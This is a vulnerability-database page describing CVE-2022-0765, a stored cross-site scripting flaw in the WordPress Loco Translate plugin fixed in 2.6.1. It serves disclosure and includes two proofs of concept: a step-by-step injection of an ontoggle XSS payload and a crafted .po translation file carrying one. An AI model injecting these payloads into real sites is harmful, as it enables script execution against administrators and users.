Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtTaurus Omar1337DAY-ID-37597
HistoryApr 07, 2022 - 12:00 a.m.

WordPress Loco Translate Plugin < 2.6.1 - Authenticated Stored Cross-Site Scripting Vulnerability

2022-04-0700:00:00
Taurus Omar
0day.today
212

0.001 Low

EPSS

Percentile

24.9%

JSON
Tittle:
WordPress Plugin Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting

References:
CVE-2022-0765

Author:
Taurus Omar 

Description:
The plugin does not properly remove inline events from elements in the source translation strings before outputting them in the editor in the plugin admin panel, allowing any user with access to the plugin (Translator and Administrator by default) to add arbitrary javascript payloads to the source strings leading to a stored cross-site scripting (XSS) vulnerability.

Affects Plugins:
loco-translate - Fixed in version 2.6.1

Proof of Concept:
## POC1: via (edit-template) 

1.) Got to Plugin Loco Translate
2.) Enter Plugins Options
3.) Enter Edit Template Any Plugin
4.) Add New Message 
5.) Edit Message
6.) Replace The Message With The Payload : ">'><details/open/ontoggle=alert('xss')>
7.) Save
8.) Replicated


## POC2 via (example.po)

1.) Got to Plugin Loco Translate
2.) Enter Plugins Options Any Plugin
3.) Upload PO options
3.) Load example.po

Example.po

msgid ""
msgstr ""
"Project-Id-Version: xss-tester\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2022-02-25 03:48+0000\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME <[emailΒ protected]>\n"
"Language-Team: \n"
"Language: \n"
"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Loco https://localise.biz/\n"
"X-Loco-Version: 2.5.8; wp-5.9.1\n"
"X-Domain: xss-tester"
msgid "xss-tester"
msgstr ""
msgid "\">'><details/open/ontoggle=confirm('XSS')>"
msgstr "" 

Classification:
Type XSS 
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79

wpScan:
https://wpscan.com/vulnerability/58838f51-323d-41e0-8c85-8e113dc2c587

Related

packetstorm 1
wpexploit 1
prion 1
cve 1
patchstack 1
wpvulndb 1
nvd 1
cvelist 1
packetstorm
packetstorm
WordPress Loco Translate Cross Site Scripting
2022-04-07 00:00:00
wpexploit
wpexploit
Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting
2022-03-22 00:00:00
prion
prion
Cross site scripting
2022-04-18 18:15:00
cve
cve
CVE-2022-0765
2022-04-18 18:15:08
patchstack
patchstack
WordPress Loco Translate plugin <= 2.6.0 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability
2022-03-22 00:00:00
wpvulndb
wpvulndb
Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting
2022-03-22 00:00:00
nvd
nvd
CVE-2022-0765
2022-04-18 18:15:08
cvelist
cvelist
CVE-2022-0765 Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting
2022-04-18 17:10:35

0.001 Low

EPSS

Percentile

24.9%

JSON
Related for 1337DAY-ID-37597
packetstorm1wpexploit1prion1cve1patchstack1wpvulndb1nvd1cvelist1